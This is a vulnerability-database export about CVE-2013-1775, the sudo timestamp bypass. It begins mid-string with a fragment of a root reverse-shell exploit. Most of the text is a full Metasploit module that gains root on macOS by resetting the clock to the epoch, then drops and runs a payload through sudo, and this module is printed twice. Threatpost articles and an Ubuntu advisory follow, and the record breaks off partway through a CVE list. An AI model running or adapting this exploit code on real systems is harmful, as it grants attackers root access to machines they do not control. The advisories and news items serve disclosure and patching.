Root Priv Escalation Root Reverse Shell \n# \n# Written by: David Kennedy @ TrustedSec \n# Website: https://www.trustedsec.com \n# Twitter: @Dave_ReL1K \n# \n# Reference: http://www.exploit-db.com/exploits/27944/ \n############################################################### \n\"\"\" \nprint \"[*] Exploit has been performed. You should have a shell on ipaddr: %s and port %s\" % (ipaddr,port) \n \n`\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/123032/macosx1084-sudo.txt"}, {"lastseen": "2016-12-05T22:24:22", "description": "", "published": "2013-08-26T00:00:00", "type": "packetstorm", "title": "Mac OS X Sudo Password Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2013-08-26T00:00:00", "id": "PACKETSTORM:122965", "href": "https://packetstormsecurity.com/files/122965/Mac-OS-X-Sudo-Password-Bypass.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# \n# http://metasploit.com/ \n## \nrequire 'shellwords' \n \nclass Metasploit3 < Msf::Exploit::Local \n \n# ManualRanking because it's going to modify system time \n# Even when it will try to restore things, user should use \n# it at his own risk \nRank = NormalRanking \n \ninclude Msf::Post::Common \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \nSYSTEMSETUP_PATH = \"/usr/sbin/systemsetup\" \nSUDOER_GROUP = \"admin\" \nVULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']] \n \n# saved clock config \nattr_accessor :time, :date, :networked, :zone, :network_server \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Mac OS X Sudo Password Bypass', \n'Description' => %q{ \nThis module gains a session with root permissions on versions of OS X with \nsudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, \nand possibly lower versions. \n \nIf your session belongs to a user with Administrative Privileges \n(the user is in the sudoers file and is in the \"admin group\"), and the \nuser has ever run the \"sudo\" command, it is possible to become the super \nuser by running `sudo -k` and then resetting the system clock to 01-01-1970. \n \nThis module will fail silently if the user is not an admin or if the user has never \nrun the sudo command. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Todd C. Miller', # Vulnerability discovery \n'joev <jvennix[at]rapid7.com>', # Metasploit module \n'juan vazquez' # testing/fixing module bugs \n], \n'References' => \n[ \n[ 'CVE', '2013-1775' ], \n[ 'OSVDB', '90677' ], \n[ 'BID', '58203' ], \n[ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ] \n], \n'Platform' => 'osx', \n'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => [ \n[ 'Mac OS X x86 (Native Payload)', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_X86 \n} \n], \n[ 'Mac OS X x64 (Native Payload)', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_X86_64 \n} \n], \n[ 'CMD', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Feb 28 2013' \n)) \nregister_advanced_options([ \nOptString.new('TMP_FILE', \n[true,'For the native targets, specifies the path that '+ \n'the executable will be dropped on the client machine.', \n'/tmp/.<random>/<random>'] \n), \n], self.class) \nend \n \n# ensure target is vulnerable by checking sudo vn and checking \n# user is in admin group. \ndef check \nif cmd_exec(\"sudo -V\") =~ /version\\s+([^\\s]*)\\s*$/ \nsudo_vn = $1 \nsudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i) \n# check vn between 1.6.0 through 1.7.10p6 \n# and 1.8.0 through 1.8.6p6 \nif not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES) \nprint_error \"sudo version #{sudo_vn} not vulnerable.\" \nreturn Exploit::CheckCode::Safe \nend \nelse \nprint_error \"sudo not detected on the system.\" \nreturn Exploit::CheckCode::Safe \nend \n \nif not user_in_admin_group? \nprint_error \"sudo version is vulnerable, but user is not in the admin group (necessary to change the date).\" \nExploit::CheckCode::Safe \nend \n# one root for you sir \nExploit::CheckCode::Vulnerable \nend \n \ndef exploit \nif not user_in_admin_group? \nfail_with(Exploit::Failure::NotFound, \"User is not in the 'admin' group, bailing.\") \nend \n# \"remember\" the current system time/date/network/zone \nprint_good(\"User is an admin, continuing...\") \n \n# drop the payload (unless CMD) \nif using_native_target? \ncmd_exec(\"mkdir -p #{File.dirname(drop_path)}\") \nwrite_file(drop_path, generate_payload_exe) \nregister_files_for_cleanup(drop_path) \ncmd_exec(\"chmod +x #{[drop_path].shelljoin}\") \nprint_status(\"Payload dropped and registered for cleanup\") \nend \n \nprint_status(\"Saving system clock config...\") \n@time = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettime\").match(/^time: (.*)$/i)[1] \n@date = cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(/^date: (.*)$/i)[1] \n@networked = cmd_exec(\"#{SYSTEMSETUP_PATH} -getusingnetworktime\") =~ (/On$/) \n@zone = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettimezone\").match(/^time zone: (.*)$/i)[1] \n@network_server = if @networked \ncmd_exec(\"#{SYSTEMSETUP_PATH} -getnetworktimeserver\").match(/time server: (.*)$/i)[1] \nend \n \nrun_sudo_cmd \nend \n \ndef cleanup \nprint_status(\"Resetting system clock to original values\") if @time \ncmd_exec(\"#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}\") unless @zone.nil? \ncmd_exec(\"#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}\") unless @date.nil? \ncmd_exec(\"#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}\") unless @time.nil? \n \nif @networked \ncmd_exec(\"#{SYSTEMSETUP_PATH} -setusingnetworktime On\") \nunless @network_server.nil? \ncmd_exec(\"#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}\") \nend \nend \n \nprint_good(\"Completed clock reset.\") if @time \nend \n \nprivate \n \ndef run_sudo_cmd \nprint_status(\"Resetting user's time stamp file and setting clock to the epoch\") \ncmd_exec( \n\"sudo -k; \\n\"+ \n\"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT\"+ \n\" -setdate 01:01:1970 -settime 00:00\" \n) \n \n# Run Test \ntest = rand_text_alpha(4 + rand(4)) \nsudo_cmd_test = ['sudo', '-S', [\"echo #{test}\"].shelljoin].join(' ') \n \nprint_status(\"Testing that user has sudoed before...\") \noutput = cmd_exec('echo \"\" | ' + sudo_cmd_test) \n \nif output =~ /incorrect password attempts\\s*$/i \nfail_with(Exploit::Failure::NotFound, \"User has never run sudo, and is therefore not vulnerable. Bailing.\") \nelsif output =~ /#{test}/ \nprint_good(\"Test executed succesfully. Running payload.\") \nelse \nprint_error(\"Unknown fail while testing, trying to execute the payload anyway...\") \nend \n \n# Run Payload \nsudo_cmd_raw = if using_native_target? \n['sudo', '-S', [drop_path].shelljoin].join(' ') \nelsif using_cmd_target? \n['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ') \nend \n \n## to prevent the password prompt from destroying session \n## backgrounding the sudo payload in order to keep both sessions usable \nsudo_cmd = 'echo \"\" | ' + sudo_cmd_raw + ' & true' \n \nprint_status \"Running command: \" \nprint_line sudo_cmd \noutput = cmd_exec(sudo_cmd) \n \nend \n \n# helper methods for accessing datastore \ndef using_native_target?; target.name =~ /native/i; end \ndef using_cmd_target?; target.name =~ /cmd/i; end \ndef drop_path \n@_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) } \nend \n \n# checks that the user is in OSX's admin group, necessary to change sys clock \ndef user_in_admin_group? \ncmd_exec(\"groups `whoami`\").split(/\\s+/).include?(SUDOER_GROUP) \nend \n \n# helper methods for dealing with sudo's vn num \ndef parse_vn(vn_str); vn_str.split(/[\\.p]/).map(&:to_i); end \ndef vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']]) \nvn_parts = parse_vn(vn) \nranges.any? do |range| \nmin_parts = parse_vn(range[0]) \nmax_parts = parse_vn(range[1]) \nvn_parts.all? do |part| \nmin = min_parts.shift \nmax = max_parts.shift \n(min.nil? or (not part.nil? and part >= min)) and \n(part.nil? or (not max.nil? and part <= max)) \nend \nend \nend \n \nend \n`\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/122965/sudo_password_bypass.rb.txt"}], "canvas": [{"lastseen": "2019-05-29T19:48:19", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "edition": 2, "description": "**Name**| sudo_timestamp \n---|--- \n**CVE**| CVE-2013-1775 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| sudo_timestamp: Linux/MacOS timestamp privilege escalation \n**Notes**| CVE Name: CVE-2013-1775 \nVENDOR: Intel, GNU/Linux, Apple \nNotes: \nThis exploit runs on GNU/Linux and MacOS X. \n \nOn both systems this exploit requires: \n\\- User has run at least once \"sudo\" \n\\- User is an admin \n \nOn GNU/Linux it also requires that the user is currently logged in \non a wm session and has an open terminal with a bound sudo timestamp \nticket (an open pts/ on which the user has run sudo at least once). \n \nRepeatability: Infinite \nReferences: http://www.sudo.ws/sudo/alerts/epoch_ticket.html \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775 \n\n", "modified": "2013-03-05T21:38:00", "published": "2013-03-05T21:38:00", "id": "SUDO_TIMESTAMP", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/sudo_timestamp", "type": "canvas", "title": "Immunity Canvas: SUDO_TIMESTAMP", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-02T07:03:07", "edition": 2, "description": "This Metasploit module gains a session with root permissions on versions of OS X with sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4, and possibly lower versions. If your session belongs to a user with Administrative Privileges (the user is in the sudoers file and is in the \"admin group\"), and the user has ever run the \"sudo\" command, it is possible to become the super user by running `sudo -k` and then resetting the system clock to 01-01-1970. This Metasploit module will fail silently if the user is not an admin or if the user has never run the sudo command.", "published": "2013-08-27T00:00:00", "type": "zdt", "title": "Mac OS X Sudo Password Bypass Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1775"], "modified": "2013-08-27T00:00:00", "id": "1337DAY-ID-21166", "href": "https://0day.today/exploit/description/21166", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n#\r\n# http://metasploit.com/\r\n##\r\nrequire 'shellwords'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n\r\n # ManualRanking because it's going to modify system time\r\n # Even when it will try to restore things, user should use\r\n # it at his own risk\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::Common\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n SYSTEMSETUP_PATH = \"/usr/sbin/systemsetup\"\r\n SUDOER_GROUP = \"admin\"\r\n VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]\r\n\r\n # saved clock config\r\n attr_accessor :time, :date, :networked, :zone, :network_server\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Mac OS X Sudo Password Bypass',\r\n 'Description' => %q{\r\n This module gains a session with root permissions on versions of OS X with\r\n sudo binary vulnerable to CVE-2013-1775. Tested working on Mac OS 10.7-10.8.4,\r\n and possibly lower versions.\r\n\r\n If your session belongs to a user with Administrative Privileges\r\n (the user is in the sudoers file and is in the \"admin group\"), and the\r\n user has ever run the \"sudo\" command, it is possible to become the super\r\n user by running `sudo -k` and then resetting the system clock to 01-01-1970.\r\n\r\n This module will fail silently if the user is not an admin or if the user has never\r\n run the sudo command.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Todd C. Miller', # Vulnerability discovery\r\n 'joev <jvennix[at]rapid7.com>', # Metasploit module\r\n 'juan vazquez' # testing/fixing module bugs\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2013-1775' ],\r\n [ 'OSVDB', '90677' ],\r\n [ 'BID', '58203' ],\r\n [ 'URL', 'http://www.sudo.ws/sudo/alerts/epoch_ticket.html' ]\r\n ],\r\n 'Platform' => 'osx',\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64, ARCH_CMD ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [\r\n [ 'Mac OS X x86 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86\r\n }\r\n ],\r\n [ 'Mac OS X x64 (Native Payload)',\r\n {\r\n 'Platform' => 'osx',\r\n 'Arch' => ARCH_X86_64\r\n }\r\n ],\r\n [ 'CMD',\r\n {\r\n 'Platform' => 'unix',\r\n 'Arch' => ARCH_CMD\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Feb 28 2013'\r\n ))\r\n register_advanced_options([\r\n OptString.new('TMP_FILE',\r\n [true,'For the native targets, specifies the path that '+\r\n 'the executable will be dropped on the client machine.',\r\n '/tmp/.<random>/<random>']\r\n ),\r\n ], self.class)\r\n end\r\n\r\n # ensure target is vulnerable by checking sudo vn and checking\r\n # user is in admin group.\r\n def check\r\n if cmd_exec(\"sudo -V\") =~ /version\\s+([^\\s]*)\\s*$/\r\n sudo_vn = $1\r\n sudo_vn_parts = sudo_vn.split(/[\\.p]/).map(&:to_i)\r\n # check vn between 1.6.0 through 1.7.10p6\r\n # and 1.8.0 through 1.8.6p6\r\n if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)\r\n print_error \"sudo version #{sudo_vn} not vulnerable.\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n else\r\n print_error \"sudo not detected on the system.\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n if not user_in_admin_group?\r\n print_error \"sudo version is vulnerable, but user is not in the admin group (necessary to change the date).\"\r\n Exploit::CheckCode::Safe\r\n end\r\n # one root for you sir\r\n Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n if not user_in_admin_group?\r\n fail_with(Exploit::Failure::NotFound, \"User is not in the 'admin' group, bailing.\")\r\n end\r\n # \"remember\" the current system time/date/network/zone\r\n print_good(\"User is an admin, continuing...\")\r\n\r\n # drop the payload (unless CMD)\r\n if using_native_target?\r\n cmd_exec(\"mkdir -p #{File.dirname(drop_path)}\")\r\n write_file(drop_path, generate_payload_exe)\r\n register_files_for_cleanup(drop_path)\r\n cmd_exec(\"chmod +x #{[drop_path].shelljoin}\")\r\n print_status(\"Payload dropped and registered for cleanup\")\r\n end\r\n\r\n print_status(\"Saving system clock config...\")\r\n @time = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettime\").match(/^time: (.*)$/i)[1]\r\n @date = cmd_exec(\"#{SYSTEMSETUP_PATH} -getdate\").match(/^date: (.*)$/i)[1]\r\n @networked = cmd_exec(\"#{SYSTEMSETUP_PATH} -getusingnetworktime\") =~ (/On$/)\r\n @zone = cmd_exec(\"#{SYSTEMSETUP_PATH} -gettimezone\").match(/^time zone: (.*)$/i)[1]\r\n @network_server = if @networked\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -getnetworktimeserver\").match(/time server: (.*)$/i)[1]\r\n end\r\n\r\n run_sudo_cmd\r\n end\r\n\r\n def cleanup\r\n print_status(\"Resetting system clock to original values\") if @time\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}\") unless @zone.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}\") unless @date.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}\") unless @time.nil?\r\n\r\n if @networked\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setusingnetworktime On\")\r\n unless @network_server.nil?\r\n cmd_exec(\"#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}\")\r\n end\r\n end\r\n\r\n print_good(\"Completed clock reset.\") if @time\r\n end\r\n\r\n private\r\n\r\n def run_sudo_cmd\r\n print_status(\"Resetting user's time stamp file and setting clock to the epoch\")\r\n cmd_exec(\r\n \"sudo -k; \\n\"+\r\n \"#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT\"+\r\n \" -setdate 01:01:1970 -settime 00:00\"\r\n )\r\n\r\n # Run Test\r\n test = rand_text_alpha(4 + rand(4))\r\n sudo_cmd_test = ['sudo', '-S', [\"echo #{test}\"].shelljoin].join(' ')\r\n\r\n print_status(\"Testing that user has sudoed before...\")\r\n output = cmd_exec('echo \"\" | ' + sudo_cmd_test)\r\n\r\n if output =~ /incorrect password attempts\\s*$/i\r\n fail_with(Exploit::Failure::NotFound, \"User has never run sudo, and is therefore not vulnerable. Bailing.\")\r\n elsif output =~ /#{test}/\r\n print_good(\"Test executed succesfully. Running payload.\")\r\n else\r\n print_error(\"Unknown fail while testing, trying to execute the payload anyway...\")\r\n end\r\n\r\n # Run Payload\r\n sudo_cmd_raw = if using_native_target?\r\n ['sudo', '-S', [drop_path].shelljoin].join(' ')\r\n elsif using_cmd_target?\r\n ['sudo', '-S', '/bin/sh', '-c', [payload.encoded].shelljoin].join(' ')\r\n end\r\n\r\n ## to prevent the password prompt from destroying session\r\n ## backgrounding the sudo payload in order to keep both sessions usable\r\n sudo_cmd = 'echo \"\" | ' + sudo_cmd_raw + ' & true'\r\n\r\n print_status \"Running command: \"\r\n print_line sudo_cmd\r\n output = cmd_exec(sudo_cmd)\r\n\r\n end\r\n\r\n # helper methods for accessing datastore\r\n def using_native_target?; target.name =~ /native/i; end\r\n def using_cmd_target?; target.name =~ /cmd/i; end\r\n def drop_path\r\n @_drop_path ||= datastore['TMP_FILE'].gsub('<random>') { Rex::Text.rand_text_alpha(10) }\r\n end\r\n\r\n # checks that the user is in OSX's admin group, necessary to change sys clock\r\n def user_in_admin_group?\r\n cmd_exec(\"groups `whoami`\").split(/\\s+/).include?(SUDOER_GROUP)\r\n end\r\n\r\n # helper methods for dealing with sudo's vn num\r\n def parse_vn(vn_str); vn_str.split(/[\\.p]/).map(&:to_i); end\r\n def vn_bt(vn, ranges) # e.g. ('1.7.1', [['1.7.0', '1.7.6p44']])\r\n vn_parts = parse_vn(vn)\r\n ranges.any? do |range|\r\n min_parts = parse_vn(range[0])\r\n max_parts = parse_vn(range[1])\r\n vn_parts.all? do |part|\r\n min = min_parts.shift\r\n max = max_parts.shift\r\n (min.nil? or (not part.nil? and part >= min)) and\r\n (part.nil? or (not max.nil? and part <= max))\r\n end\r\n end\r\n end\r\n\r\nend\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21166"}], "threatpost": [{"lastseen": "2018-10-06T23:00:15", "bulletinFamily": "info", "cvelist": ["CVE-2013-1775"], "description": "Attackers looking to exploit a previously disclosed and apparently still unpatched bug in sudo, a Unix-based Linux command found in most Apple OS X builds have gotten a little more help this week.\n\nAs [Threatpost reported](<http://threatpost.com/time-stamp-bug-sudo-could-have-allowed-code-entry-030513/77587>) in March, the vulnerability ([CVE-2013-1775](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775>)) can essentially set back the compromised system\u2019s clock to January 1, 1970, also known as the epoch, so the attacker can be granted access to the machine without entering a password.\n\n[Sudo](<http://www.sudo.ws/sudo/stable.html>) manages user privileges on several types of systems, including versions of OS X from Lion 10.7 to Mountain Lion 10.8.4, as well as several Linux distributions.\n\nMetasploit, the penetration testing software that makes it easier to exploit vulnerabilities, added a module this week that makes exploiting the sudo vulnerability less difficult.\n\nDeveloped by the folks over at Rapid 7, the Metasploit tool has proved invaluable for security researchers who investigate flaws and \u201cpen test\u201d software.\n\nThe module \u201cgains a session with root permissions\u201d as long as the user has run the sudo command before and as long as they have administrative privileges, according to a [Packet Storm Security](<http://packetstormsecurity.com/files/122965>) post Monday by sudo developer Todd Miller, Rapid 7\u2019s Joe Vennix and Metasploit developer Juan Vazquez.\n\nIn addition to the previously mentioned conditions, they of course must have physical or remote access on top of admin access to the machine, making execution of the bug even less likely.\n\nMiller previously reported that Sudo 1.8.6p7 and 1.7.10p7 fixed the bug and made it so future versions would ignore the epoch time stamp, in a [Seclists post](<http://seclists.org/oss-sec/2013/q1/489>) in February but this module appears to circumvent that.\n", "modified": "2013-08-29T17:28:56", "published": "2013-08-29T13:28:56", "id": "THREATPOST:F7D745AB279D28510E91229D1CA48DC0", "href": "https://threatpost.com/metasploit-module-adds-sudo-vulnerability-for-os-x/102138/", "type": "threatpost", "title": "Metasploit Module Adds Sudo Vulnerability for OS X", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:12", "bulletinFamily": "info", "cvelist": ["CVE-2013-1775"], "description": "A vulnerability in sudo \u2013 a program that manages user privileges on certain types of systems \u2013 could allow an unauthenticated user to execute commands for about five minutes, without entering a password.\n\nThe problem, which has since been fixed, previously existed in builds 1.6.0 through 1.7.10p6 and 1.8.0 through 1.8.6p6 of [sudo](<http://www.sudo.ws/sudo/intro.html>). The program is usually found in Unix-based Linux and Mac OS X systems.\n\nAccording to an alert on its site, Sudo claims the vulnerable five minute time period stems from a time stamp that usually authorizes users to run the program after they\u2019ve authenticated. The bug, discovered by German researcher Marco Schoepl last week, involves tricking the system\u2019s clock by setting it to the epoch reference date 1970-01-01 01:00:00. Attackers could have access to the clock if a user leaves their sudo system open to date/time changes or if the battery is completely drained. From there they can use \u201csudo \u2013k\u201d kill syntax to reset the time stamp file and execute commands without a password prompt.\n\nCanonical, [working with Ubuntu](<http://www.ubuntu.com/usn/usn-1754-1/>), publicized the vulnerability ([CVE-2013-1775](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1775>)) last week after it was posted to Seclists.org\u2019s [Full Disclosure lists](<http://seclists.org/oss-sec/2013/q1/489>) by sudo developer Todd Miller.\n\nNew versions of sudo, 1.8.6p7 and 1.7.10p7, fix the vulnerability and going forward the program will ignore any time stamps set to epoch.\n", "modified": "2013-04-17T16:30:36", "published": "2013-03-05T18:17:50", "id": "THREATPOST:4FCE977F9517BD5F5952F684C88CEBE0", "href": "https://threatpost.com/time-stamp-bug-sudo-could-have-allowed-code-entry-030513/77587/", "type": "threatpost", "title": "Time Stamp Bug in Sudo Could Have Allowed Code Entry", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:47", "bulletinFamily": "software", "cvelist": ["CVE-2013-1775"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1754-1\r\nFebruary 28, 2013\r\n\r\nsudo vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.10\r\n- Ubuntu 12.04 LTS\r\n- Ubuntu 11.10\r\n- Ubuntu 10.04 LTS\r\n- Ubuntu 8.04 LTS\r\n\r\nSummary:\r\n\r\nSudo could be made to run programs as the administrator without a password\r\nprompt.\r\n\r\nSoftware Description:\r\n- sudo: Provide limited super user privileges to specific users\r\n\r\nDetails:\r\n\r\nMarco Schoepl discovered that Sudo incorrectly handled time stamp files\r\nwhen the system clock is set to epoch. A local attacker could use this\r\nissue to run Sudo commands without a password prompt.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.10:\r\n sudo 1.8.5p2-1ubuntu1.1\r\n sudo-ldap 1.8.5p2-1ubuntu1.1\r\n\r\nUbuntu 12.04 LTS:\r\n sudo 1.8.3p1-1ubuntu3.4\r\n sudo-ldap 1.8.3p1-1ubuntu3.4\r\n\r\nUbuntu 11.10:\r\n sudo 1.7.4p6-1ubuntu2.2\r\n sudo-ldap 1.7.4p6-1ubuntu2.2\r\n\r\nUbuntu 10.04 LTS:\r\n sudo 1.7.2p1-1ubuntu5.6\r\n sudo-ldap 1.7.2p1-1ubuntu5.6\r\n\r\nUbuntu 8.04 LTS:\r\n sudo 1.6.9p10-1ubuntu3.10\r\n sudo-ldap 1.6.9p10-1ubuntu3.10\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1754-1\r\n CVE-2013-1775\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/sudo/1.8.5p2-1ubuntu1.1\r\n https://launchpad.net/ubuntu/+source/sudo/1.8.3p1-1ubuntu3.4\r\n https://launchpad.net/ubuntu/+source/sudo/1.7.4p6-1ubuntu2.2\r\n https://launchpad.net/ubuntu/+source/sudo/1.7.2p1-1ubuntu5.6\r\n https://launchpad.net/ubuntu/+source/sudo/1.6.9p10-1ubuntu3.10\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n", "edition": 1, "modified": "2013-03-02T00:00:00", "published": "2013-03-02T00:00:00", "id": "SECURITYVULNS:DOC:29109", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29109", "title": "[USN-1754-1] Sudo vulnerability", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:50", "bulletinFamily": "software", "cvelist": ["CVE-2013-1775", "CVE-2013-1776"], "description": "It's possible to bypass password request by manipulating timestamps. Session id hijacking is possible under some conditions.", "edition": 1, "modified": "2013-03-10T00:00:00", "published": "2013-03-10T00:00:00", "id": "SECURITYVULNS:VULN:12913", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12913", "title": "sudo protection bypass", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-5768", "CVE-2015-5600", "CVE-2015-2787", "CVE-2015-5779", "CVE-2013-1775", "CVE-2015-3185", "CVE-2015-3786", "CVE-2015-1792", "CVE-2015-3761", "CVE-2014-7844", "CVE-2015-3781", "CVE-2015-3776", "CVE-2015-2783", "CVE-2015-5748", "CVE-2014-1912", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3762", "CVE-2015-3329", "CVE-2009-5078", "CVE-2015-5754", "CVE-2015-3783", "CVE-2015-3330", "CVE-2014-3613", "CVE-2015-1789", "CVE-2015-3789", "CVE-2014-8150", "CVE-2014-3583", "CVE-2015-3779", "CVE-2015-3788", "CVE-2015-3778", "CVE-2015-0241", "CVE-2013-1776", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3775", "CVE-2013-7338", "CVE-2015-3798", "CVE-2015-5777", "CVE-2015-3765", "CVE-2015-3782", "CVE-2015-0242", "CVE-2015-0253", "CVE-2015-3784", "CVE-2015-3787", "CVE-2015-3799", "CVE-2015-3153", "CVE-2015-3768", "CVE-2015-3760", "CVE-2015-4148", "CVE-2015-5781", "CVE-2015-3805", "CVE-2015-3790", "CVE-2015-5774", "CVE-2015-3792", "CVE-2015-3803", "CVE-2015-3307", "CVE-2015-4025", "CVE-2015-5784", "CVE-2015-5751", "CVE-2015-4024", "CVE-2015-3795", "CVE-2015-5750", "CVE-2015-5747", "CVE-2015-4021", "CVE-2015-3144", "CVE-2014-7185", "CVE-2015-5761", "CVE-2013-2777", "CVE-2015-3794", "CVE-2015-5773", "CVE-2015-3769", "CVE-2014-3707", "CVE-2015-3800", "CVE-2015-0228", "CVE-2015-3807", "CVE-2015-0244", "CVE-2015-4026", "CVE-2014-8769", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-1788", "CVE-2015-4147", "CVE-2014-8161", "CVE-2012-6685", "CVE-2015-5753", "CVE-2015-3183", "CVE-2015-3772", "CVE-2014-3620", "CVE-2014-9140", "CVE-2013-2776", "CVE-2015-4022", "CVE-2015-3770", "CVE-2015-3777", "CVE-2015-5771", "CVE-2015-5775", "CVE-2015-3780", "CVE-2013-7422", "CVE-2015-5755", "CVE-2015-3145", "CVE-2015-1790", "CVE-2015-5758", "CVE-2014-0106", "CVE-2015-0243", "CVE-2015-3804", "CVE-2015-3773", "CVE-2014-3581", "CVE-2015-3774", "CVE-2015-5782", "CVE-2014-8109", "CVE-2015-5778", "CVE-2013-7040", "CVE-2015-3757", "CVE-2015-3764", "CVE-2015-3143", "CVE-2014-0067", "CVE-2015-5772", "CVE-2015-3791", "CVE-2014-9365", "CVE-2014-8151", "CVE-2015-5757", 